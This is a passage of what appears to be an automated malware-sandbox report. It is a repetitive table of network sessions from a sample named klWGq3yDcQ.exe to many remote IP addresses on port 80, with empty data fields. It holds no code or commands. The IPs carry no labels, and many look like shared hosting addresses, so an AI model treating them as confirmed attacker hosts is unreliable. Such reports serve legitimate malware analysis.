                                                                                                                                                                                                    165192.168.2.45789135.214.252.247806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    166192.168.2.457909109.168.109.224806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    167192.168.2.45703834.208.26.152806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    168192.168.2.457892133.130.97.143806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    169192.168.2.458070185.230.63.186806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    170192.168.2.457920133.130.97.143806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    171192.168.2.4580723.33.130.190806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    172192.168.2.458074104.200.30.31806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    173192.168.2.458071103.224.212.226806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    174192.168.2.45806735.214.252.247806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    175192.168.2.45808589.31.143.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    176192.168.2.458083185.183.156.218806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    177192.168.2.458075185.183.156.218806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    178192.168.2.45807381.169.145.157806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    179192.168.2.45809381.169.145.157806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    180192.168.2.458088191.252.51.5806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    181192.168.2.45801413.234.155.54806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    182192.168.2.45819115.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    183192.168.2.458216159.203.32.4806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    184192.168.2.45830415.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    185192.168.2.457942148.66.138.193806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    186192.168.2.458188139.162.169.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    187192.168.2.458323162.210.96.11780
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    188192.168.2.458242139.162.169.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    189192.168.2.458377185.230.63.107806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    190192.168.2.45834845.40.150.54806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    191192.168.2.45840254.83.33.36806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    192192.168.2.45838515.235.14.141806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    193192.168.2.458322199.34.228.177806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    194192.168.2.45841054.83.33.36806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    195192.168.2.458407162.241.62.220806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    196192.168.2.45836489.31.143.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    197192.168.2.45851535.237.190.156806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    198192.168.2.458262148.66.138.193806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    199192.168.2.458538104.247.74.107806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    200192.168.2.458706185.230.63.171806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    201192.168.2.458705185.230.63.186806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    202192.168.2.45866972.167.58.161806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    203192.168.2.45871976.223.105.230806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    204192.168.2.458718192.96.211.44806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    205192.168.2.4587683.33.130.190806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    206192.168.2.458700103.224.212.226806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    207192.168.2.458704185.54.192.125806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    208192.168.2.4588473.33.130.190806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    209192.168.2.4588783.94.41.167806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    210192.168.2.45871799.81.150.60806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    211192.168.2.458742178.32.41.233806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    212192.168.2.45877115.236.29.106806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    213192.168.2.45875681.169.145.74806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    214192.168.2.458925172.96.186.206806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    215192.168.2.458965192.124.249.13806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    216192.168.2.458956109.168.109.224806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    217192.168.2.45893935.214.252.247806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    218192.168.2.45872013.234.155.54806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    219192.168.2.458886191.6.210.8806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    220192.168.2.459004103.224.212.226806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    221192.168.2.45913423.185.0.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    222192.168.2.45908592.62.143.50806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    223192.168.2.45906981.169.145.74806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    224192.168.2.459148104.26.12.245806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    225192.168.2.459130117.20.63.148806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    226192.168.2.4593403.111.240.680
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    227192.168.2.45938335.214.252.247806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    228192.168.2.459433117.20.63.14820306240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    229192.168.2.45957876.223.26.96806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    230192.168.2.45959315.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    231192.168.2.45958672.167.58.161806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    232192.168.2.459581185.183.156.218806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    233192.168.2.459582185.183.156.218806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    234192.168.2.45959581.169.145.157806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    235192.168.2.459580133.130.97.143806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    236192.168.2.45959281.169.145.157806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    237192.168.2.459579133.130.97.143806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    238192.168.2.45969215.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    239192.168.2.459695162.250.126.5806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    240192.168.2.45968515.235.14.141806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    241192.168.2.45973447.246.24.211806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    242192.168.2.459749162.210.96.117806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    243192.168.2.45969445.40.150.54806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    244192.168.2.459693191.252.51.5806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    245192.168.2.45977845.40.150.54806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    246192.168.2.4599523.33.130.190806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    247192.168.2.45994352.206.191.232806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    248192.168.2.4599923.33.130.190806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    249192.168.2.45992666.235.200.147806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    250192.168.2.459994185.230.63.186806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    251192.168.2.459991192.96.211.44806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    252192.168.2.459944104.247.74.107806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    253192.168.2.45975413.234.155.54806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    254192.168.2.46005176.223.26.96806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    255192.168.2.460064192.124.249.13806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    256192.168.2.46005323.185.0.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    257192.168.2.460074172.96.186.206806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    258192.168.2.459946185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    259192.168.2.45994589.31.143.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    260192.168.2.45993474.220.219.189806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    261192.168.2.460062162.241.62.220806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    262192.168.2.45995635.164.64.246806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    263192.168.2.45993895.168.220.210806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    264192.168.2.460056172.67.132.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    265192.168.2.45998889.31.143.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    266192.168.2.46005434.136.104.255806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    267192.168.2.46006734.136.104.255806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    268192.168.2.460009139.162.169.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    269192.168.2.460018139.162.169.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    270192.168.2.460006194.47.252.115806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    271192.168.2.460032109.168.109.224806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    272192.168.2.46006015.236.29.106806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    273192.168.2.46004935.214.252.247806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    274192.168.2.46005599.81.150.60806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    275192.168.2.46007181.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    276192.168.2.460069213.0.13.44806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    277192.168.2.46005081.169.145.74806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    278192.168.2.460095185.54.192.125806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    279192.168.2.46007078.128.62.138806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    280192.168.2.460125178.32.41.233806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    281192.168.2.460176144.202.62.131806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


